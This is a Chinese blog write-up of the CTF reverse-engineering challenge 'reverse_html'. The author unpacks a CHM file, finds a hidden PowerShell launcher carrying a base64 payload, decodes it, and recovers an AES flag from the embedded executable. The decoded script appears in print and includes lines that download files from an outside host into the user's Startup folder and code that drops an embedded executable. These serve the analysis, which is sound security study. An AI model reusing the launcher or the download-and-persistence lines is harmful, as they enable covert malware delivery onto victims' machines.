攻防世界 reverse_html

已于 2022-11-07 12:04:35 修改
阅读量1.5k 收藏 1
点赞数 2
文章标签: 安全
于 2022-11-07 11:58:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43798872/article/details/127728365
版权

下载题目后,拿到题目发现是一个html帮助文件,chm Windows help file

百度搜索一下,发现这个文件windows可以处理,先把后缀名加上.chm就可以打开查看了
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-O2YB7dez-1667792663831)(C:\Users\HP\AppData\Roaming\Typora\typora-user-images\image-20221106173130564.png)]

四个页面都一模一样,也没有什么有用的信息,使用hh将之解包,cmd中

hh -decompile C:\xxx\Desktop(存放位置) C:\xxx\Desktop\doc.chm(帮助文档)

在这里插入图片描述
解出来这么三个东西,两个网页,还有一个hhc文件,没什么用,查看这两个网页

在doc.htm源码中发现了一串很奇怪的命令,和一长串base64编码
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-uyfNVJHr-1667792663834)(C:\Users\HP\AppData\Roaming\Typora\typora-user-images\image-20221106173822869.png)]

cmd.exe,/c START /MIN C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile powershell.exe -WindowStyle hidden -nologo -noprofile -e SQBuAHYAbwBrAGUALQBFAHgAcAByAGUAcwBzAGkAbwBuACAAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAgACgAJAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBDAG8AbQBwAHIAZQBzAHMAaQBvAG4ALgBEAGUAZgBsAGEAdABlAFMAdAByAGUAYQBtACAAKAAkACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACAAKAAsACQAKABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACcAbgBaAEYAZABhADgASQB3AEYASQBiAHYAQgAvADYASABVAEMAcwBvAG0ANwBIAHQAaAByAE0AZAB1ADMAQgArAGcARABDAG4AVwBJAGMAWAB5AHgAaABwAGUAOQBTAE8ATgBnAG4AcAAwAGUAcQAvAFgAMgBzAHIAMgAvAFYAeQBHAGQANAA4ADUAegBsADUAbQA4AFEATQBrAHgAZwBFAGsAbQBjAGkASQBPAC8ASwA0AEIAdABDAEoAUAA0ADUAUQAwAGoAcABHAHkARABkAFEARABDADYASgBKADQAYQBOADgAMQByAG0AbwA1AGwATABoAEwASgBvADIAbQBjAFEATgB2AFkASQB5AHEAdgAxADcATgBkAGgAOQByADkAQQBlADIANwAxAEgAWgBjAGIAMgBCAFoAVgBpACsARwBSAE8ANABrAFYAVwBKAG4AMwBCAEgARABCAEgASAAwAEMAcgBMAHEATwBaAFoAagAzAGIAdgAyAEkAOABWAFUARwBaADEALwBvAGIALwBXADgANgBYAHQAbABOAGoAVwB1AHoAOQBaAEwAVgBlAEwANgBlAHgAMQAwAG0ASgBEAHAAYwBZAGMATwBWAHQASgBuAHMAWgBpAHgAKwBaAHgAcQBHAFUAbQB0ADgAZwAyAHMAWQBoAGsAbgBqAEUAZgB1AFUAWQB5AEIAMwBGAGcAUwB5ADEAMwBtAHEAZgAxADMAVQBHAHgAUABTAFEASwBOAEEAMAA0AGwAbABxAGwAbQBBAFkAZQBrAFcAMQBoADAANwBnAHgAUQB5AG0AdwArAHEAMgBQADIAWQBLAFcAaQBwACsAZQB0AHkAbwBDAHcAeQBSAFoAdwB3AG4AYgBoAHEAbgB5AGkARQBVAHkAcABPAEUAKwBMAFEAbABtAEgASgAzAHMASQBuADkAOQBTAG0AYwBpAGcAdABOAGkAMgB6AFoATwA5AGEAbgBtAG0ATgBYAGcAdgAwAG4ALwBFAEcAUwBvAGkAeABYAGEARgBlAFMAVwBEAEQAcQAxAFEAeQBsAFEAbAB6AFMAUwA0AGcAZwBhAEMANAArAHAAbAB1AGsATAB6ADYARAAvADQATgBmAFAASwB1AGEARgA3AHcATgAyAFIANwBYADkAYgB3ACsAcwA3AE0ARwAyAEgAZQBmAFMAUQB6AFcAYQBkAEMAYwBpAGwARgBFAEIASQBNAEUAWgBpADYAMQAvAEEAQQA9AD0AJwApACkAKQApACwAIABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACwAIABbAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQA7AA==

powershell 参数的作用大概就是隐式执行 -e接受base64参数,将b64解码得到

Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String('nZFda8IwFIbvB/6HUCsom7HthrMdu3B+gDCnWIcXyxhpe9SONgnp0eq/X2sr2/VyGd485zl5m8QMkxgEkmciIO/K4BtCJP45Q0jpGyDdQDC6JJ4aN81rmo5lLhLJo2mcQNvYIyqv17Ndh9r9Ae271HZcb2BZVi+GRO4kVWJn3BHDBHH0CrLqOZZj3bv2I8VUGZ1/ob/W86XtlNjWuz9ZLVeL6ex10mJDpcYcOVtJnsZix+ZxqGUmt8g2sYhknjEfuUYyB3FgSy13mqf13UGxPSQKNA04llqlmAYekW1h07gxQymw+q2P2YKWip+etyoCwyRZwwnbhqnyiEUypOE+LQlmHJ3sIn99SmcigtNi2zZO9anmmNXgv0n/EGSoixXaFeSWDDq1QylQlzSS4ggaC4+plukLz6D/4NfPKuaF7wN2R7X9bw+s7MG2HefSQzWadCcilFEBIMEZi61/AA==')))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();

嵌套了一层加密,此处直接base64解密得到的是乱码,因为外面还有一层解压缩命令IO.Compression

IO.Compression.CompressionMode]::Decompress 是C#语言的

string b64 = "nZFda8IwFIbvB/6HUCsom7HthrMdu3B+gDCnWIcXyxhpe9SONgnp0eq/X2sr2/VyGd485zl5m8QMkxgEkmciIO/K4BtCJP45Q0jpGyDdQDC6JJ4aN81rmo5lLhLJo2mcQNvYIyqv17Ndh9r9Ae271HZcb2BZVi+GRO4kVWJn3BHDBHH0CrLqOZZj3bv2I8VUGZ1/ob/W86XtlNjWuz9ZLVeL6ex10mJDpcYcOVtJnsZix+ZxqGUmt8g2sYhknjEfuUYyB3FgSy13mqf13UGxPSQKNA04llqlmAYekW1h07gxQymw+q2P2YKWip+etyoCwyRZwwnbhqnyiEUypOE+LQlmHJ3sIn99SmcigtNi2zZO9anmmNXgv0n/EGSoixXaFeSWDDq1QylQlzSS4ggaC4+plukLz6D/4NfPKuaF7wN2R7X9bw+s7MG2HefSQzWadCcilFEBIMEZi61/AA==";
string res="";
byte[] buffer = Convert.FromBase64String(b64);
System.IO.MemoryStream ms = new System.IO.MemoryStream();
ms.Write(buffer, 0, buffer.Length);
ms.Position = 0;
System.IO.Compression.DeflateStream stream = 
	 new System.IO.Compression.DeflateStream(ms, 		                            		 System.IO.Compression.CompressionMode.Decompress);
stream.Flush();

int nSize = 16 * 1024 + 256; 
byte[] decompressBuffer = new byte[nSize];
int nSizeIncept = stream.Read(decompressBuffer, 0, nSize);
stream.Close();

res=System.Text.Encoding.ASCII.GetString(decompressBuffer, 0, nSizeIncept);
Console.WriteLine((res));

解密成功,终于知道这串代码是干什么用的了
在这里插入图片描述

# $client = new-object System.Net.WebClient;
# $client.DownloadFile("http://192.168.69.129:8000/ielogo.png", "$env:temp/20203917.tmp")
# $client.DownloadFile("http://192.168.69.129:8000/_TMP12", "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\helper.bat")
# read file
$content = [IO.File]::ReadAllText("$pwd\doc.chm")
$idx1 = $content.IndexOf("xxxxxxxx")
#定位到doc.chm的8个x的位置
$helper = $content.Substring($idx1 + 8)
#位置+8,就是从8个x后的位置开始
$cont = [System.Convert]::FromBase64String($helper)
#将这些东西base64解密
Set-Content "$env:temp\20201122.tmp" $cont -Encoding byte

去看看doc.chm里到底有什么,使用hxd打开,搜索xxxxxxxx
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-QayvpWX4-1667792663835)(C:\Users\HP\AppData\Roaming\Typora\typora-user-images\image-20221106175328779.png)]
从这里开始进行base64解密,直到文件末尾,先尝试在线解密
在这里插入图片描述

解密出来后发现了pe头,那么使用脚本将其解密成16进制形式,再用hxd新建文件,16进制保存为exe即可

import base64
def base64_decode(base64_data):
  	temp = base64.b64decode(base64_data).hex()
  	return temp
data = "basecode"
tem = base64_decode(data)
print(tem)

同时打开了一个devcpp编译的exe程序用于对比,很快发现解密出的内容少了两个字节
在这里插入图片描述

添加后保存得到了一个32位程序,前期工作结束,后面才开始用ida逆向。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-BuGzxbqW-1667792663838)(C:\Users\HP\AppData\Roaming\Typora\typora-user-images\image-20221106180228160.png)]在这里插入图片描述
但是得到的exe运行不了,程序中也没有输入输出相关的提示,只有两个加密函数
函数1140:
在这里插入图片描述
这是AES加密的S盒初始值
密钥拓展:

在这里插入图片描述
在这里插入图片描述

判断为AES密钥,这里对AES加密不够熟悉,在网上搜了很久才发现是AES加密,那么v8就是密钥,v9是密文,同时没有输入,flag就隐藏在byte_100030B0中
使用python解密(AES_ECB),注意是数据存储形式是小端存储,比如0x16157E2B->0x2B,0x7E,0x15,0x16

flag{thisisit01}
或守
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
reverse_geocode
05-25
反向地理编码 反向地址解析采用纬度/经度坐标,并返回国家和城市。 用法示例: >> > import reverse_geocode >> > coordinates = ( - 37.81 , 144.96 ), ( 31.76 , 35.21 ) >> > reverse_geocode . search ( coordinates ) [{ 'city' : 'Melbourne' , 'country_code' : 'AU' , 'country' : 'Australia' }, { 'city' : 'Jerusalem' , 'country_code' : 'IL' , 'country' : 'Israel' }] 该模块具有一组已知的地理编码位置,并使用有效地找到最近的邻居。 当您需要对大量坐标进行地理编码以使Web API不实用时,这将非常有用。 由于这是
攻防世界 Reverse高手进阶区 3分题 secret-string-400
闵行小鱼塘
02-02 282
继续ctf的旅程,攻防世界Reverse高手进阶区的3分题,本篇是secret-string-400的writeup
攻防世界Reverse(5)
njh18790816639的博客
04-05 332
secret-string-400 后缀为gz,第一次见这种压缩包! 当然我们也可以直接就去用ida看看,是可以发现无法进行逆向的,所以我们解压它! 有点像web题型,不过它是给了代码的! 我们打开看看! 这是用火狐打开所显示的内容,用IE打开是没有办法完整显示的,此时我们再来看看另一个html页面! 有意思!没想到是个这样子的逆向! 然后源代码是没有相关内容的,但是再js里面有,所以我们可以找到js,用记事本打开即可! 然后我们在调试器中进行一系列调试! 不过调试结果在console显示必须在r
攻防世界web题目记录(一)
wanan的博客
10-06 2528
攻防世界web题目记录(一)
攻防世界 Reverse 梅津美治郎
XFox_的博客
08-23 229
梅津美治郎 拖进ida,分析main函数 strcpy(Str2, "r0b0RUlez!"); dword_40AD94 = (int)&v9; dword_40ADA0 = (int)&v20; dword_40AD8C = (char *)v18; dword_40AD90 = (char *)v16; dword_40AD98 = (int)v14; lpProcName = (LPCSTR)v12; lpModuleName = (LPCSTR)v13
攻防世界 REVERSE
BvxiE的博客
01-22 277
标题1 game 下载得到游戏界面,先玩着试试吧! 每次输入后开关会变化,可是不仅仅是按照输入变化的,,,,,,,,,,, 硬着头皮试试,n=1 2 3 4 5 6 7 8,可得flag。 但是按这种做法,也不是长久之计,怎么办呢?度娘一下,网上不都有。下面我按照网上方法试试,原文链接在这,https://blog.csdn.net/ookami6497/article/details/115412972 将下载文件拖入IDA 32位中,但是为什么时32位,不是64位呐?度娘,,,
攻防世界reverse
clayzx的博客
11-30 334
新手练习区 Hello, CTF 下载附件,查壳,32位,无壳 运行一下程序,查看效果,可以看到要我们输入,等会可以根据这串字符串判断flag的位置 拖进ida32位,静态分析,shift+f12查看字符串,发现 success!下面还有一个可疑字符串怀疑是进行处理过的flag 双击查看字符串存储的位置,ctrl+x交叉引用,查看在那个地方使用了这个字符串 进入后追踪到这个位置,f5查看c代码,会汇编的也可以直接干汇编 可以看到用户只能输入最多17个字符,超过便会结束,也就是falg不会超过1
攻防世界Reverse解题(一)
weixin_46703850的博客
03-13 2616
攻防世界Reverse解题(一)
解析模板中的html代码,反向解析_模板继承_html 转义(示例代码)
weixin_33525438的博客
06-10 193
反向解析根据url正则生成一个地址href = "{% url ‘booktest:show‘ %}"正则如果分组了,分几个组就传几个参数,反向解析就需要传参,直接空格再后面写就可以了,如:{% url ‘booktest:show‘ ‘p1‘ ‘p2‘ %}好处:动态生成链接地址,降低维护成本示例# views.pydef reverse(request):return render(reque...
html5字符串反转,003实现字符串反转reverse
weixin_30172941的博客
06-30 203
这个简单就直接代码了//写代码翻转一个C风格的字符串。(C风格的意思是"abcd"需要用5个字符来表示,包含末尾的 结束字符)#include #include void swap(char& vLeft, char& vRight){char Temp = vLeft;vLeft = vRight;vRight = Temp;}char* reverse(char* vStr)...
MFC.rar_mfc reverse_mfc驱动开发
09-20
驱动开发入门之:MFC 消息逆向分析,搞逆向分析的朋友可以看看,相信还是有收获的.
Reverse printing_Reverse_printing_
09-30
code for Quera challenge : ...
nixu.rar_Reverse_字符串 逆序
09-24
字符串逆序,这是第一次来上传东西,希望大家给个介意.
Practical Reverse Engineering_Reverse_reverseengineering_enginee
10-02
practical reverse engineering
攻防世界reverse)no-strings-attached
CRX的博客
11-15 879
最近发现creak越来越好玩了,已经从吾爱上面下载了160个creakme,准备没事creak一下。 那么废话不多说了,直接搞题吧。 1.看文件类型 ELF格式的可执行文件,或许一会要用到linux环境(本人是在巨硬的windows10环境下搞的:)。 2.IDA静态分析 放到ida中进行分析,查看main函数反汇编后的伪代码是这样的: 通过各位无聊地探索,终于发现,除了authenticat...
攻防世界-web】disabled_button
最新发布
weixin_73625393的博客
10-29 173
根据提供的类名 "btn btn-default",可以推断该按钮可能具有默认样式,并且被视为一个按钮。在您提供的代码中,该输入元素的类型为 "submit",表示它是一个提交按钮,用于将表单数据提交到服务器。在您提供的代码中,该输入元素被禁用,用户无法点击或提交该按钮。属性:此属性定义了按钮的名称,用于在提交表单时标识该按钮的值。在您提供的代码中,按钮的名称为 "auth"。需要注意的是,根据页面提供的代码片段,该按钮被禁用,无法进行交互或提交。在您提供的代码中,按钮上显示的文本为 "flag"。
攻防世界 flag_in_your_hand
m0_49025459的博客
03-11 2840
下载附件打开文件中的html文件 无论输入什么都是错误 我们打开网页源代码看看 <html> <head> <title>Flag in your Hand</title> <style type="text/css"> body { padding-left: 30%; } #flag { font-family: Garamond, serif; font-size: 3..
攻防世界 reverse android-app-100
09-24 475
android-app-100suctf-2016 jeb启动,找到点击事件: 验证流程: 输入作为参数 --> processObjectArrayFromNative 得到一返回值(ret_a) --> IsCorrect 返回0,失败;返回1,成功 --> 输出"Sharif_CTF("+md5(str(d+ret_a)+” “+”)“ (....
黑客攻防技术之编码
薛定谔的博客
02-27 3003
之前的文章提到了,应用程序需要将用户的输入看作是不安全的输入,是安全正确的做法,其中一种方式就是将用户输入的内容进行转义或编码,接下来就介绍一下web应用程序对其数据采用的几种不同的编码方案。 (1)URL编码 URL编码只允许US-ASCII字符集中的可打印字符(就是ASCII代码在0x20-0x7e范围内的字符)。所有的URL编码的字符都以%为前缀,其后是这个字符的两位十六进制ASCII代...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值